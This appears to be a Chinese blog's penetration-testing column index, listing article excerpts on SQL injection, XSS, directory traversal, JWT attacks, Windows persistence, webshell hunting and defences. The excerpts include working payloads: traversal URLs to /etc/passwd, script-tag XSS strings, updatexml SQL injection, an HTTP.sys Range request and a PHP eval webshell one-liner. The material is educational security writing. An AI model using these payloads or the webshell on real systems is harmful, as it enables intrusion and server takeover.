【渗透测试】
文章平均质量分 73
渗透测试技巧
Bypass--
一个网络安全爱好者,对技术有着偏执狂一样的追求。致力于分享原创高质量干货,包括但不限于:Web安全、代码审计、内网渗透、应急响应、企业安全等领域。
展开
-
最好用的内网穿透工具合集
在渗透过程中,我们需要快速实现内网穿透,从而绕过网络访问限制,直接从外网来访问内网。今天,我们来推荐几款非常好用的内网穿透工具,如有其它推荐,欢迎补充和指正。1、ngrokngrok 是...原创 2020-08-31 08:00:31 · 26316 阅读 · 0 评论 -
一份超级实用的勒索病毒自救指南
经常会有一些小伙伴问:中了勒索病毒,该怎么办,可以解密吗?第一次遇到勒索病毒是在早几年的时候,客户因网站访问异常,进而远程协助进行排查。登录服务器,在站点目录下发现所有的脚本文件及附件后...原创 2019-12-30 08:12:07 · 24723 阅读 · 0 评论 -
绕过小程序签名验证
在一些关键业务接口通常会对请求参数进行签名验证,一旦篡改参数服务端就会提示签名校验失败。在黑盒渗透过程中,如果没办法绕过签名校验,那么就无法进一步漏洞检测。微信小程序的前端代码很容易被反编译,一旦签名加密算法和密钥暴漏,找到参数的排序规则,那么就可以篡改任意数据并根据算法伪造签名。01、常见签名算法首先呢,我们需要注意的是,加密和签名是两回事,加密是为了防止信息泄露,而签名的目的是防止数......原创 2022-06-16 09:00:00 · 1409 阅读 · 0 评论 -
常用Web安全扫描工具合集
初入门时,喜欢将目标站点直接丢扫描器,慢慢等扫描结果,极度依赖Web扫描器;而有一些漏洞高手,善于运用运用各种工具但并不依赖工具,经常可以找到扫描工具发现不了的漏洞。一款好用的Web扫描器...原创 2021-04-25 08:00:00 · 15075 阅读 · 4 评论 -
Window下常见的权限维持方式
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。0x01 注册表自启动通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。常用的注册表启动键:# Run键 HKEY_CURRENT_USER\Software\Microsoft\Win...原创 2019-12-02 08:10:14 · 44512 阅读 · 1 评论 -
JWT攻击手册:如何入侵你的Token
JSON Web Token(JWT)对于渗透测试人员而言,可能是一个非常吸引人的攻击途径。因为它不仅可以让你伪造任意用户获得无限的访问权限,而且还可能进一步发现更多的安全漏洞,如信息泄露,越权访问,SQLi,XSS,SSRF,RCE,LFI等。首先我们需要识别应用程序正在使用JWT,最简单的方法是在代理工具的历史记录中搜索JWT正则表达式:[=]ey[A-Za-z0-9_-]*\....原创 2019-12-11 08:10:04 · 30349 阅读 · 0 评论 -
PC客户端(CS架构)如何实现抓包
针对PC客户端(C/S架构)的渗透测试,相比于B/S架构,它所使用到的通讯协议有多种,如TCP、HTTP(S)、TDS等。如何实现PC客户端抓包呢,常使用的工具有Wireshark、iptool、WSExplorer等。本文通过Fiddler+Proxifer 抓取PC客户端(C/S架构)客户端中的HTTP(S)流量。环境准备1、Windows安装客户端软件2、Proxifi...原创 2019-10-21 08:23:52 · 7822 阅读 · 2 评论 -
【渗透测试学习平台】 web for pentester -4.目录遍历
Example 1http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwdExample 2http://192.168.106.154/dirtrav/example2.php?file=/var/www/files/../../../../../../../etc/passw...原创 2016-07-21 16:41:00 · 499 阅读 · 0 评论 -
【渗透测试学习平台】 web for pentester -3.XSS
Example 1http://192.168.91.139/xss/example1.php?name=hacker<script>alert('xss')</script> Example 2http://192.168.91.139/xss/example2.php?name=hacker<ScriPt>alert('xss')</S...原创 2016-07-21 16:39:00 · 569 阅读 · 0 评论 -
【渗透测试学习平台】 web for pentester -2.SQL注入
Example 1字符类型的注入,无过滤http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23http://192.168.91.139/sqli/example1.php?name=root' and 1=2%23...原创 2016-07-21 15:13:00 · 595 阅读 · 0 评论 -
【渗透测试学习平台】 web for pentester -1.介绍与安装
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。官网:https://www.pentesterlab.com下载地址:https://www.pentesterlab.com/exercises/web_for_pentester_II 安装流程: 1、新建一个空白的虚拟机 2、选择w...原创 2016-07-21 15:12:00 · 1301 阅读 · 3 评论 -
Mysql 下 Insert、Update、Delete、Order By、Group By注入
Insert:语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)报错注入:insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');insert...原创 2016-07-21 10:06:00 · 472 阅读 · 0 评论 -
HTTP.sys漏洞验证及防护
使用发包工具构造http请求包检测 以fiddler工具为例,构造如下图的请求包:1 GET http://192.168.174.145/ HTTP/1.12 Host: 192.168.174.1453 Range: bytes=0-184467440737095516154 Connection: keep-alive5 Cache-Control: max-age=06 A...原创 2016-07-07 14:37:00 · 1638 阅读 · 0 评论 -
linux查找webshell
原文出处:http://my.oschina.net/longquan/blog/155905首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面<?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接隐藏很深的小马fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112...原创 2016-06-30 12:29:00 · 413 阅读 · 0 评论 -
X-WAF简单测试体验
X-WAF最近才关注到的一款云WAF,花了一些时间搭建了一个环境,并做了一些测试,感觉比较适合新手来练习WAF Bypass。X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。官网:https://waf.xsec.io/源码:https://github.com/xsec-lab安装部署系统版本:Centos6.5 x86...原创 2017-08-27 14:48:00 · 2568 阅读 · 0 评论 -
SQL参数化查询--最有效可预防SQL注入攻击的防御方式
参数化查询(Parameterized Query 或 Parameterized Statement)是访问数据库时,在需要填入数值或数据的地方,使用参数 (Parameter) 来给值。 在使用参数化查询的情况下,数据库服务器不会将参数的内容视为SQL指令的一部份来处理,而是在数据库完成SQL指令的编译后,才套用参数运行,因此就算参数中含有指令,也不会被数据库运行。Acces...原创 2016-05-08 19:30:00 · 618 阅读 · 0 评论 -
SQL注入测试平台 SQLol -4.UPDATE注入测试
访问首页的update模块http://127.0.0.1/sql/update.php,开始对update模块进行测试。update语法: UPDATE 【users】 SET 【username】 = 【'haxotron9000'】 WHERE username = 【'1'】 接收的参数可能拼接到上述语句中【】的任一个位置,4个位置,共有5种不同的类型。下面开始演示: ...原创 2016-05-26 20:47:00 · 477 阅读 · 0 评论 -
SQL注入测试平台 SQLol -5.DELETE注入测试
访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试。delete语法:DELETE FROM 【users】 WHERE 【username】 = 【'1'】 几个位置都可能存在注入,这里只演示一种。下面演示注入到不同位置的方法。 一、String in WHERE clause构造P...原创 2016-05-26 20:57:00 · 505 阅读 · 0 评论 -
SQL注入测试平台 SQLol -6.CHALLENGES挑战
SQLol上面的挑战共有14关,接下来我们一关一关来突破。 Challenge 0目的是让查询返回所有的用户名,而不是只有一个。SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY username ASC注入点在【1】处构造POC: 1' or 1=1# 或者 1' ...原创 2016-05-28 00:48:00 · 711 阅读 · 0 评论 -
PHP代码审计 -1.SQL注入总结
0x01 背景 最近在学习PHP代码审计,这里做一个SQL注入总结,是对自己学习知识的总结,也是为自己学习的笔记,方便自己反复翻阅。 0x02 PHP代码审计-SQL注入挖掘SQL注入漏洞的时候,最简单也最容易被发现的就是什么都没过滤的情况。 代码示例 <?php ...原创 2016-05-30 11:18:00 · 414 阅读 · 0 评论 -
urlscan使用详解
0x01 简介与下载 URLScan是集成在IIS上的,可以制约的HTTP请求的安全工具。通过阻止特定的HTTP请求,URLScan安全工具有助于防止潜在的有害的请求到达服务器上的应用。 最新版URLScan 3.1,支持IIS 5.1,IIS 6和IIS 7在Windows Vista和Windows Server 2008。下载地址:http://www.iis.net/downl...原创 2016-06-15 12:21:00 · 538 阅读 · 0 评论 -
利用URLScan工具过滤URL中的特殊字符(仅针对IIS6)-- 解决IIS短文件名漏洞
IIS短文件名漏洞在windows服务器上面非常常见,也就是利用“~”字符猜解暴露短文件/文件夹名,比如,采用这种方式构造URL:http://aaa.com/abc~1/.aspx,根据IIS返回的错误信息,猜测该路径或文件是否存在,具体可参考这篇文章:http://www.freebuf.com/articles/4908.html。就单纯的解决这个问题来说,微软的URLScan工具是最适...原创 2016-06-15 12:26:00 · 965 阅读 · 0 评论 -
XSS跨站脚本小结
XSS漏洞验证经常遇到一些过滤,如何进行有效验证和绕过过滤呢,这里小结一下常见的一些标签,如<a><img>等。参考链接:http://www.jb51.net/tools/xss.htm http://d3adend.org/xss/ghettoBypass ';alert(String.fromCharCode(88,83,83))//\';alert(...原创 2016-06-16 14:34:00 · 1004 阅读 · 0 评论 -
浅谈CSRF攻击方式
一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。二.CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚...原创 2016-06-17 17:44:00 · 384 阅读 · 1 评论 -
【渗透技巧】资产探测及信息收集
一、前言在众测中,基本上SRC的漏洞收集范围有如下几种形式:形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内形式二:只奖励与*.xxx.com相关的漏洞形式三:无限制形式一,基本被限定了范围形式二,注重于子域名的收集形式三,子域名及相关域名的收集另外,随着企业内部业务的不断壮大,各种业务平台和管理系统越来越多,很多单位往往存在着“隐形资产”,...原创 2018-03-24 13:24:00 · 11505 阅读 · 1 评论